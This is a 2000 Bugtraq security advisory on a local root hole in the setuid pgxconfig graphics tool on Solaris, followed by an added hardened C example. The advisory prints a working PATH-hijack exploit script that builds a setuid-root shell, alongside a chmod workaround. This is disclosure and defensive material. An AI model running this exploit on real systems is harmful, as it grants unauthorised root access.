>From owner-bugtraq@SECURITYFOCUS.COM Wed Aug 2 11:08:46 2000
Return-Path:
Date: Mon, 2 Aug 0100 11:56:57 +0000
Reply-To: suid@SUID.KG
Sender: Bugtraq List
From: suid@SUID.KG
Subject: Local root compromise in PGX Config Sun Sparc Solaris
To: BUGTRAQ@SECURITYFOCUS.COM

hi guys and gals

yeah, here's something i have had sitting on the shelf until the vendor sent me a fix. they seem to have done that, so here it is. drum roll...

--- Start ---

suid@suid.kg - Raptor GFX config tool local root vulnerability

Short Name: PGXCONFIG-SPARC
Software:   Raptor GFXtra configuration tool - pgxconfig
URL:        http://www.techsource.com
            ftp://www.techsource.com/download/gfxtra.OWv101.tar.Z
Version:    PGX32 (Raptor GFX) X Window System Support v2.3.1
Platforms:  Sun Solaris: 2.5.1 Sparc
                         2.6 Sparc
                         7 Sparc
                         8 Sparc
Type:       Multiple. Lack of environment sanity checks.
            Insufficient bounds checking.
            Insecure use of the /tmp dir.
Date:       04 July 2000

Summary:

Local users can run arbitrary commands as root.

Background:

Raptor GFX cards are PCI accelerated graphics adapters suitable for use in Sun Sparc systems (among others). The associated driver and configuration software is distributed for the Sun platform from the techsource.com website.

Vulnerability:

The configuration tool associated with this product is called pgxconfig and is installed in /usr/sbin mode 4555 by default.

Extract from pkgmap:

1 d none sbin 0775 root bin
1 s none sbin/GFXconfig=pgxconfig
1 f none sbin/pgxconfig 4555 root bin 105956 42039 934907098

With this command it is possible for any user on the system to change the openwin configuration. The way this program does this is using system("cp"); to copy the existing configuration to a backup before overwriting the configuration with a new file.

Anyway, we all know that Solaris's implementation of system() does NOT execute processes with root privileges when the user's uid >= 100. However, this particular version of pgxconfig does a nice setuid(0); for us.
So, while we had euid = 0 from being executed as a suid root program, we now have uid = 0 and thus system() will execute whatever it's told to, as root.

In this particular program, system() is used badly and two things are going on:

1. root privileges are not dropped
2. the environment is not sanitised

Without source I can't show you exactly what's going on in there, but the result is obviously insecure.

It's worth noting here (and demonstrating in the exploit) that the use of system("cp /whatever /wherever"); isn't the only system() call worth exploiting. I've used the easiest one in my exploit below.

Other problems noted but not investigated were multiple command line options lacking proper bounds checking and predictable temp file creation. It would be a good idea for the vendor to perform a complete audit on this product.

Exploit:

---------------------------CUT---------------------------
#!/usr/local/bin/bash
# TechSource Raptor GFX configurator root exploit
# suid@suid.kg

# unfortunately a compiler must be installed to use this example
# exploit. however there's a million ways around this you know

# on my system, gcc isn't in my path
PATH=$PATH:/usr/local/bin

# build a little prog, nothing new here folks
echo '#include' > ./x.c
echo 'int main(void) { setuid(0); setgid(0); execl ("/bin/sh", "/bin/sh", "-i",0);}' >> ./x.c
gcc x.c -o foobar
rm -f ./x.c

# build a substitute chown command. i much prefer this over
# regular chown
echo "#!/bin/sh" > chown
echo "/usr/bin/chown root ./foobar" >> chown
echo "/usr/bin/chmod 4755 ./foobar" >> chown
chmod 0755 chown

# oooh look, it's the magical fairy path variable
export PATH=.:$PATH

# here's one way to skin a cat
# (there's more, some need valid devices. exercise for the readers)
/usr/sbin/pgxconfig -i

rm -f chown
./foobar
----------------------------END--------------------------

Fix:

No source, no fix. A workaround is:

Disable /usr/sbin/pgxconfig or /usr/sbin/GFXconfig (or both) or at least remove the suid bit.
# chmod 0 /usr/sbin/pgxconfig

or

# chmod 0511 /usr/sbin/pgxconfig

Until your vendor can issue a fix.

Greets:

duke - r0x j00r s0x
cr - m3mb3r 0f t4sk f0rc3 el1t3-p0rn-k1ngz
yowie - elite greet wh0re
ratcorpse + par - congrats dudes
anyone i met at defcon 8 / black hat briefings

Thumbs Down:

Network Solutions - assholes

http://www.suid.edu/advisories/012.txt

--- EOF ---
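The Vulnerability section above describes the bug class exactly: a setuid-root tool that widens its privileges with setuid(0) and then hands a command to system(), which searches the caller's PATH through the shell. For contrast, the C below shows the hardened form of that privileged-copy step. It is an added example written for this page, not TechSource code and not part of the advisory; the function names, the choice of /bin/cp as the copy helper, the fixed PATH value and the sample paths in main() are all assumptions of the example.

```c
/* Hardened privileged-copy pattern (added example, not vendor code).
 * Three changes relative to the pattern the advisory describes:
 *   1. never call setuid(0) to widen privileges; drop to the real uid instead
 *   2. never trust the caller's environment (PATH, IFS, LD_*) in a child
 *   3. never use system(); exec a fixed absolute path with a fixed environment
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/wait.h>

/* Fixed environment for any child process. Assumed values: the child is
 * found by absolute path anyway, so the caller's PATH never matters. */
static char *const SAFE_ENV[] = {
    "PATH=/usr/bin:/bin",
    "IFS= \t\n",
    NULL
};

/* Returns 1 if p is absolute and contains no ".." path component, else 0.
 * Used to vet file arguments before they reach a privileged copy. */
int path_is_acceptable(const char *p) {
    if (p == NULL || p[0] != '/') return 0;
    const char *s = p;
    while ((s = strstr(s, "..")) != NULL) {
        int at_start = (s == p) || s[-1] == '/';
        int at_end   = s[2] == '\0' || s[2] == '/';
        if (at_start && at_end) return 0;   /* a real ".." component */
        s += 2;
    }
    return 1;
}

/* Run /bin/cp src dst with a fixed environment and no shell in between.
 * Returns the child's exit status, or -1 on a rejected path or fork/exec
 * failure. Nothing here consults the caller's PATH, so a "chown" or "cp"
 * dropped into the current directory is never picked up. */
int privileged_copy(const char *src, const char *dst) {
    if (!path_is_acceptable(src) || !path_is_acceptable(dst)) return -1;
    pid_t pid = fork();
    if (pid < 0) return -1;
    if (pid == 0) {
        char *const argv[] = { "cp", (char *)src, (char *)dst, NULL };
        execve("/bin/cp", argv, SAFE_ENV);   /* absolute path, fixed env */
        _exit(127);                          /* exec failed */
    }
    int status;
    if (waitpid(pid, &status, 0) < 0) return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Permanently give up setuid privileges, returning to the invoking user.
 * Returns 0 on success, -1 if any step fails; a caller must abort on -1,
 * because continuing with root still in effect is the advisory's bug. */
int drop_privileges(void) {
    uid_t ruid = getuid();
    gid_t rgid = getgid();
    if (setgid(rgid) != 0) return -1;       /* gid first, while still root */
    if (setuid(ruid) != 0) return -1;       /* from euid 0 this sets all uids */
    if (geteuid() != ruid || getegid() != rgid) return -1;   /* verify it stuck */
    return 0;
}

int main(void) {
    /* Constructed sample paths; the copy runs with whatever rights the
     * invoking user has once privileges are dropped. */
    int rc = privileged_copy("/dev/null", "/tmp/pgx_example_backup.tmp");
    printf("backup copy exit status: %d\n", rc);
    if (drop_privileges() != 0) {
        fprintf(stderr, "could not drop privileges, aborting\n");
        return 1;
    }
    printf("now running as uid %d\n", (int)getuid());
    return 0;
}
```

The order matters: do the one operation that genuinely needs root (here the backup copy of the existing configuration) through execve with an absolute path and a fixed environment, then drop privileges before anything driven by user input runs. Solaris's system() refusing to run as root for uid >= 100 was a safety net; a program that calls setuid(0) removes that net, while one that never raises its real uid and never invokes a shell does not need it.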